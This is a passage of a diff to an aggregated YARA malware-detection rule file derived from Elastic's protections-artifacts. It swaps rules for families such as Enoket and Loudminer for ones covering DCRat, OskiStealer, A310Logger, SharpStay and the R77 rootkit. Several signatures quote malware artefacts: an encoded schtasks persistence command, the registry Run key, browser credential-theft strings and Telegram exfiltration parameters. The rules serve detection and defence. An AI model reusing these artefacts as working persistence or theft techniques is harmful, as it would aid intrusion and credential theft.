"2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Enoket.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3355ad81c566914a7d7734b40c46ded0cfa53aa22c6e834d42e185bf8bbe6128" - logic_hash = "19cb7f02ca80095293c4a09f7ea616c31364af1e4189a9211aaba54aaa2db14e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Roopre.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "36ae2bf773135fdb0ead7fbbd46f90fd41d6f973569de1941c8723158fc6cfcc" + logic_hash = "32294e476a014a919d2d738bdc940a7fc5f91e1b13c005f164a5b6bf84eb2635" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "627418bfe84af36e9b34d42aa42cb6d793e6bc41aa555a77e4f9389a9407d6f2" + fingerprint = "1a87cccd06b99e0375ffef17d4b3c5fd8957013ab8de7507e9b8d1174573a6cf" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80362,28 +80860,28 @@ rule ELASTIC_Linux_Exploit_Enoket_80Fac3E9 : FILE MEMORY os = "linux" strings: - $a = { 42 4C 45 20 54 4F 20 4D 41 50 20 5A 45 52 4F 20 50 41 47 45 } + $a = { 54 24 08 48 C7 C6 18 FC FF FF 49 8B 4A 08 48 89 C8 48 99 48 } condition: all of them } -rule ELASTIC_Linux_Exploit_Enoket_7Da5F86A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Roopre_05F7F237 : FILE MEMORY { meta: - description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" + description = "Detects Linux Trojan Roopre (Linux.Trojan.Roopre)" author = "Elastic Security" - id = "7da5f86a-c177-47c9-a82e-50648c84174a" + id = "05f7f237-dcc5-4f0d-8baa-290137eea9c5" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Enoket.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "406b003978d79d453d3e2c21b991b113bf2fc53ffbf3a1724c5b97a4903ef550" - logic_hash = "df5769a87230f5e563849302f32673b5f5de2595e12de72c27921d45edc58928" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Roopre.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "36ae2bf773135fdb0ead7fbbd46f90fd41d6f973569de1941c8723158fc6cfcc" + logic_hash = "12e14ac31932033f2448b7a3bfd6ce826fff17494547ac4baefb20f6713baf5f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cf9a703969e3f9a3cd20119fc0a24fa2d16bec5ea7e3b1a8df763872625c90fc" + fingerprint = "2f1d7fd2d0104be63180003ae225eafa95f9d967154d3972782502742bbedf43" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80391,115 +80889,124 @@ rule ELASTIC_Linux_Exploit_Enoket_7Da5F86A : FILE MEMORY os = "linux" strings: - $a = { FF 75 F2 80 7D 94 00 74 23 0F B6 0F B8 01 00 00 00 3A 4D 94 } + $a = { 01 3A 74 06 80 7F 02 5C 75 1F 48 83 C7 03 B2 5C EB E8 38 D1 48 8D } condition: all of them } -rule ELASTIC_Linux_Exploit_Enoket_C77C0D6D : FILE MEMORY +rule ELASTIC_Macos_Backdoor_Applejeus_31872Ae2 : FILE MEMORY { meta: - description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" + description = "Detects Macos Backdoor Applejeus (MacOS.Backdoor.Applejeus)" author = "Elastic Security" - id = "c77c0d6d-7f5c-4618-b6f6-3c1ddc70783c" - date = "2021-01-12" - modified = "2021-09-16" + id = "31872ae2-f6df-4079-89c2-866cb2e62ec8" + date = "2021-10-18" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Enoket.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ae8f7e7df62316400d0c5fe0139d7a48c9f184e92706b552aad3d827d3dbbbf" - logic_hash = "504d61715bd5dba7f777fcb2d62eb53d8d54dad2dcf93f2fc2d7dcd359c4b994" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Backdoor_Applejeus.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e352d6ea4da596abfdf51f617584611fc9321d5a6d1c22aff243aecdef8e7e55" + logic_hash = "1d6f06668a7d048a93e53b294c5ab8ffe4cd610f3bef3fd80f14425ef8a85a29" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "739e23abbd2971d6ff24c94a87d7aab082aec85f9cd7eb3a168b35fa22f32eb9" + fingerprint = "24b78b736f691e6b84ba88b0bb47aaba84aad0c0e45cf70f2fa8c455291517df" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 6E 64 20 74 68 65 20 77 6F 72 6C 64 2C 20 6F 6E 65 20 68 61 } + $a = { FF CE 74 12 89 F0 31 C9 80 34 0F 63 48 FF C1 48 39 C8 75 F4 } condition: all of them } -rule ELASTIC_Linux_Exploit_Enoket_Fbf508E1 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Dcrat_1Aeea1Ac : FILE MEMORY { meta: - description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" + description = "Detects Windows Trojan Dcrat (Windows.Trojan.DCRat)" author = "Elastic Security" - id = "fbf508e1-2a44-417e-a2e4-8d43c2b64017" - date = "2021-01-12" - modified = "2021-09-16" + id = "1aeea1ac-69b9-4cc6-91af-18b7a79f35ce" + date = "2022-01-15" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Enoket.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d1fa8520d3c3811d29c3d5702e7e0e7296b3faef0553835c495223a2bc015214" - logic_hash = "21b1d69677c3fddb210dcf5947e8321abccd5a1ebbde8438a83fee5d4b29443d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DCRat.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "6163e04a40ed52d5e94662131511c3ae08d473719c364e0f7de60dff7fa92cf7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4909d3a04b820547fbff774c64c112b8a6a5e95452992639296a220776826d98" + fingerprint = "fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 45 E8 76 0F 48 8B 45 E8 48 83 E8 01 0F B6 00 3C 5F 74 DF 48 8B } + $a1 = "havecamera" ascii fullword + $a2 = "timeout 3 > NUL" wide fullword + $a3 = "START \"\" \"" wide fullword + $a4 = "L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g" wide fullword + $a5 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==" wide fullword + $b1 = "DcRatByqwqdanchun" ascii fullword + $b2 = "DcRat By qwqdanchun1" ascii fullword condition: - all of them + 5 of ($a*) or 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Merlin_Bbad69B8 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Oskistealer_A158B1E3 : FILE MEMORY { meta: - description = "Detects Linux Trojan Merlin (Linux.Trojan.Merlin)" + description = "Detects Windows Trojan Oskistealer (Windows.Trojan.OskiStealer)" author = "Elastic Security" - id = "bbad69b8-e8fc-43ce-a620-793c059536fd" - date = "2022-09-12" - modified = "2022-10-18" + id = "a158b1e3-21b7-4009-9646-6bee9bde98ad" + date = "2022-03-21" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Merlin.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d9955487f7d08f705e41a5ff848fb6f02d6c88286a52ec837b7b555fb422d1b6" - logic_hash = "e18079c9f018dc8d7f2fdf5c950b405f9f84ad2a5b18775dbef829fe1cb770c3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_OskiStealer.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "568cd515c9a3bce7ef21520761b02cbfc95d8884d5b2dc38fc352af92356c694" + logic_hash = "0ddbe0b234ed60f5a3fc537cdaebf39f639ee24fd66143c9036a9f4786d4c51b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "594f385556978ef1029755cea53c3cf89ff4d6697be8769fe1977b14bbdb46d1" + fingerprint = "3996a89d37494b118654f3713393f415c662850a5a76afa00e83f9611aee3221" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { DA 31 C0 BB 1F 00 00 00 EB 12 0F B6 3C 13 40 88 3C 02 40 88 } + $a1 = "\"os_crypt\":{\"encrypted_key\":\"" ascii fullword + $a2 = "%s / %s" ascii fullword + $a3 = "outlook.txt" ascii fullword + $a4 = "GLoX6gmCFw==" ascii fullword + $a5 = "KaoQpEzKSjGm8Q==" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Merlin_C6097296 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Backegmm_B59712E6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Merlin (Linux.Trojan.Merlin)" + description = "Detects Linux Trojan Backegmm (Linux.Trojan.Backegmm)" author = "Elastic Security" - id = "c6097296-c518-4541-99b2-e2f6d3e4610b" - date = "2022-09-12" - modified = "2022-10-18" + id = "b59712e6-d14d-4a57-a3d6-2dc323bf840d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Merlin.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d9955487f7d08f705e41a5ff848fb6f02d6c88286a52ec837b7b555fb422d1b6" - logic_hash = "f48ed7f19ab29633600fde4bfea274bf36e7f60d700c9806b334d38a51d28b92" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Backegmm.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d6c8e15cb65102b442b7ee42186c58fa69cd0cb68f4fd47eb5ad23763371e0be" + logic_hash = "a2e6016bfd8475880c28c89b5f5beeef1335de9529d44bbe7c5aaa352aab9a29" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8496ec66e276304108184db36add64936500f1f0dd74120e03b78c64ac7b5ba1" + fingerprint = "61b2f0c7cb98439b05776edeaf06b114d364119ebe733d924158792110c5e21c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80507,57 +81014,61 @@ rule ELASTIC_Linux_Trojan_Merlin_C6097296 : FILE MEMORY os = "linux" strings: - $a = { 54 24 38 48 89 5C 24 48 48 85 C9 75 62 48 85 D2 75 30 48 89 9C 24 C8 00 } + $a = { 69 73 74 65 6E 00 66 6F 72 6B 00 73 70 72 69 6E 74 66 00 68 } condition: all of them } -rule ELASTIC_Windows_Attacksimulation_Hovercraft_F5C7178F : FILE MEMORY +rule ELASTIC_Windows_Trojan_A310Logger_520Cd7Ec : FILE MEMORY { meta: - description = "Detects Windows Attacksimulation Hovercraft (Windows.AttackSimulation.Hovercraft)" + description = "Detects Windows Trojan A310Logger (Windows.Trojan.A310logger)" author = "Elastic Security" - id = "f5c7178f-9a3f-463d-96a7-0a82cbed9ba2" - date = "2022-05-23" - modified = "2022-07-18" - reference = "046645b2a646c83b4434a893a0876ea9bd51ae05e70d4e72f2ccc648b0f18cb6" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_AttackSimulation_Hovercraft.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e707e89904a5fa4d30f94bfc625b736a411df6bb055c0e40df18ae65025a3740" + id = "520cd7ec-840c-4d45-961b-8bc5e329c52f" + date = "2022-01-11" + modified = "2022-04-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_A310logger.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "60fb9597e5843c72d761525f73ca728409579d81901860981ebd84f7d153cfa3" + logic_hash = "6095ce913e3fb1cfc2f1b091598fc06b2dfec30c2353be7df08dcbb1a06b07c3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8965ab173fd09582c9e77e7c54c9722b91b71ecbe42c4f8a8cc87d9a780ffe8c" - severity = 1 + fingerprint = "f4ee88e555b7bd0102403cc804372f5376debc59555e8e7b4a16e18b04d1b314" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "MyHovercraftIsFullOfEels" wide fullword - $a2 = "WinHttp.dll" fullword + $a1 = "/dumps9taw" ascii fullword + $a2 = "/logstatus" ascii fullword + $a3 = "/checkprotection" ascii fullword + $a4 = "[CLIPBOARD]<<" wide fullword + $a5 = "&chat_id=" wide fullword condition: all of them } -rule ELASTIC_Linux_Ransomware_Itssoeasy_30Bd68E0 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_4557_B7E15F5E : FILE MEMORY CVE_2016_4557 { meta: - description = "Detects Linux Ransomware Itssoeasy (Linux.Ransomware.ItsSoEasy)" + description = "Detects Linux Exploit Cve 2016 4557 (Linux.Exploit.CVE-2016-4557)" author = "Elastic Security" - id = "30bd68e0-3050-4aaf-b1bb-3ae10b6bd6dd" - date = "2023-07-28" - modified = "2024-02-13" + id = "b7e15f5e-73d2-4718-8fac-e6a285b0c73c" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_ItsSoEasy.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "efb1024654e86c0c30d2ac5f97d27f5f27b4dd3f7f6ada65d58691f0d703461c" - logic_hash = "a8838af442d1106bc9a7df93d6d8335ff0275bf5928acbb605e9bad58ce6bbd4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_4557.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bbed2f81104b5eb4a8475deff73b29a350dc8b0f96dcc4987d0112b993675271" + logic_hash = "9c40233fec9607404ca4f78313e0f62922180e5ef88dbf801dd60725af61bdde" score = 75 - quality = 71 - tags = "FILE, MEMORY" - fingerprint = "33170bbe6d182b36c77d732c283377f6f84cf82bd8d28cc4c3aef4d0914a0ae8" + quality = 73 + tags = "FILE, MEMORY, CVE-2016-4557" + fingerprint = "14baf456521fd7357a70ddde9da11f27d17a45d7d12c70a0101d6bdc45e30c74" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80565,59 +81076,57 @@ rule ELASTIC_Linux_Ransomware_Itssoeasy_30Bd68E0 : FILE MEMORY os = "linux" strings: - $a1 = { 6D 61 69 6E 2E 65 6E 63 72 79 70 74 44 61 74 61 2E 66 75 6E 63 31 } - $a2 = { 6D 61 69 6E 2E 6D 61 6B 65 41 75 74 6F 52 75 6E } + $a = { 2E 20 69 66 20 74 68 69 73 20 77 6F 72 6B 65 64 2C 20 79 6F } condition: all of them } -rule ELASTIC_Windows_Trojan_Solarmarker_D466E548 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mech_D30Ec0A0 : FILE MEMORY { meta: - description = "Detects Windows Trojan Solarmarker (Windows.Trojan.SolarMarker)" + description = "Detects Linux Trojan Mech (Linux.Trojan.Mech)" author = "Elastic Security" - id = "d466e548-eb88-41e6-9740-ae59980db835" - date = "2023-12-12" - modified = "2024-01-12" + id = "d30ec0a0-3fd6-4d83-ad29-9d45704bc8ce" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SolarMarker.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "330f5067c93041821be4e7097cf32fb569e2e1d00e952156c9aafcddb847b873" - hash = "e2a620e76352fa7ac58407a711821da52093d97d12293ae93d813163c58eb84b" - logic_hash = "c0792bc3c1a2f01ff4b8d0a12c95a74491c2805c876f95a26bbeaabecdff70e9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mech.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "710d1a0a8c7eecc6d793933c8a97cec66d284b3687efee7655a2dc31d15c0593" + logic_hash = "268aeb25d6468412d8123bab5eb2c8bd7704828d0ef3c3d771aa036e374127d7" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "0f4b0162ee8283959e10c459ddc55eb00eae30d241119aad1aa3ea6c101f9889" + fingerprint = "061e9f1aade510132674d87ab5981e5b6b0ae3a2782a97d8cc6c2be7b26c6454" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 00 00 2B 03 00 2B 15 00 07 2D 09 08 16 FE 01 16 FE 01 2B 01 17 00 13 04 11 04 2D 8C 07 2D 06 08 } + $a = { 6E 63 20 2D 20 4C 69 6E 75 78 20 32 2E 32 2E 31 } condition: all of them } -rule ELASTIC_Windows_Trojan_Solarmarker_08Bfc26B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Diamondfox_18Bc11E3 : FILE MEMORY { meta: - description = "Detects Windows Trojan Solarmarker (Windows.Trojan.SolarMarker)" + description = "Detects Windows Trojan Diamondfox (Windows.Trojan.DiamondFox)" author = "Elastic Security" - id = "08bfc26b-efda-49b4-b685-57edca8b9d18" - date = "2024-05-29" - modified = "2024-06-12" + id = "18bc11e3-5872-40b0-a3b7-cef4b32fac15" + date = "2022-03-02" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SolarMarker.yar#L22-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c1a6d2d78cc50f080f1fe4cadc6043027bf201d194f2b73625ce3664433a3966" - logic_hash = "b31b9f8460b606426c1101eba39a41a75c7ecaafc62388a6a5ac0f24057561ed" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DiamondFox.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a44c46d4b9cf1254aaabd1e689f84c4d2c3dd213597f827acabface03a1ae6d1" + logic_hash = "c64e4b3349b33cfd0fec1fe41f91ad819bb6b6751e822d7ab8d14638ad27571d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9c0c4a5bce63c9d99d53813f7250b3ccc395cb99eaebb8c016f8c040fbfa4ea7" + fingerprint = "6f908d11220e218a7b59239ff3cc00c7e273fb46ec99ef7ae37e4aceb4de7831" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80625,117 +81134,124 @@ rule ELASTIC_Windows_Trojan_Solarmarker_08Bfc26B : FILE MEMORY os = "windows" strings: - $a1 = { 07 09 91 61 D2 9C 09 20 C8 00 00 00 5D 16 FE 01 16 FE 01 13 } - $a2 = { 91 07 08 91 61 D2 9C 08 20 C8 00 00 00 5D 16 FE 01 16 FE 01 } - $a3 = { 06 08 06 08 91 07 08 91 61 D2 9C 08 20 C8 00 00 00 5D 16 FE } + $a1 = "\\wscript.vbs" wide fullword + $a2 = "\\snapshot.jpg" wide fullword + $a3 = "&soft=" wide fullword + $a4 = "ping -n 4 127.0.0.1 > nul" wide fullword + $a5 = "Select Name from Win32_Process Where Name = '" wide fullword condition: - any of them + all of them } -rule ELASTIC_Linux_Cryptominer_Loudminer_581F57A9 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpstay_Eac706C5 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Loudminer (Linux.Cryptominer.Loudminer)" + description = "Detects Windows Hacktool Sharpstay (Windows.Hacktool.SharpStay)" author = "Elastic Security" - id = "581f57a9-36e0-4b95-9a1e-837bdd4aceab" - date = "2021-01-12" - modified = "2021-09-16" + id = "eac706c5-975e-43f2-b106-149f884a2e9a" + date = "2022-11-20" + modified = "2023-01-11" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Loudminer.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c2729395805fc9d3c1e654c9a065bbafc4f28d8ab235afaae8d2c484060596b" - logic_hash = "82db0985f215da1d84e16fce94df7553b43b06082bf5475515dbbcf016c40fe4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpStay.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "498d201f65b57a007a79259ce7015eb7eb1bba660d44deafea716e36316a9caa" + logic_hash = "b85679018658e33e81cd2589e9f99cf9ed16ac25b27d93bece26cb5ccc2e379a" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "1013e6e11ea2a30ecf9226ea2618a59fb08588cdc893053430e969fbdf6eb675" + fingerprint = "346e6cf9d85c737b171914b331bb1837f90696301dbe144cbf8996b8a8cb3adb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 44 24 08 48 8B 70 20 48 8B 3B 48 83 C3 08 48 89 EA 48 8B 07 FF } + $guid = "2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA" ascii wide nocase + $print_str0 = "[+] Registry key HKCU:SOFTWARE\\Classes\\CLSID\\{0}\\InProcServer32 created" ascii wide fullword + $print_str1 = "Sharpstay.exe action=ElevatedRegistryKey" ascii wide fullword + $print_str2 = "[+] WMI Subscription {0} has been created to run at {1}" ascii wide fullword + $print_str3 = "[+] Cleaned up %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Indexing.{0}" ascii wide fullword condition: - all of them + $guid or all of ($print_str*) } -rule ELASTIC_Linux_Cryptominer_Loudminer_F2298A50 : FILE MEMORY +rule ELASTIC_Windows_Rootkit_R77_5Bab748B : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Loudminer (Linux.Cryptominer.Loudminer)" + description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" author = "Elastic Security" - id = "f2298a50-7bd4-43d8-ac84-b36489405f2e" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Loudminer.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c2729395805fc9d3c1e654c9a065bbafc4f28d8ab235afaae8d2c484060596b" - logic_hash = "6c2c9b6aea1fb35f8f600dd084ed9cfd56123f7502036e76dd168ccd8b43b28f" + id = "5bab748b-8576-4967-9b50-a3778db1dd71" + date = "2022-03-04" + modified = "2022-04-12" + reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Rootkit_R77.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c" + logic_hash = "ebf851ef41fde8e3118acc742cd2b38651f662a00f11dd6f7c65cf56019c43d5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8eafc1c995c0efb81d9ce6bcc107b102551371f3fb8efdf8261ce32631947e03" + fingerprint = "2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { B6 04 07 41 8D 40 D0 3C 09 76 AD 41 8D 40 9F 3C 05 76 A1 41 8D } + $a = { 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Loudminer_851Fc7Aa : FILE MEMORY +rule ELASTIC_Windows_Rootkit_R77_Eb366Abc : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Loudminer (Linux.Cryptominer.Loudminer)" + description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" author = "Elastic Security" - id = "851fc7aa-6514-4f47-b6b5-a1e730b5d460" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Loudminer.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c2729395805fc9d3c1e654c9a065bbafc4f28d8ab235afaae8d2c484060596b" - logic_hash = "9f271a16fe30fbf0c16533522b733228f19e0c44d173e4c0ef43bf13323e7383" + id = "eb366abc-d256-4dd2-ad97-898fdf905b8a" + date = "2023-05-09" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Rootkit_R77.yar#L22-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "21e7f69986987fc75bce67c4deda42bd7605365bac83cf2cecb25061b2d86d4f" + logic_hash = "3d6f1c60bf749c53f4a4fcfd6490d309e4450d5f7e64de4665c3d80af1bce44f" score = 75 quality 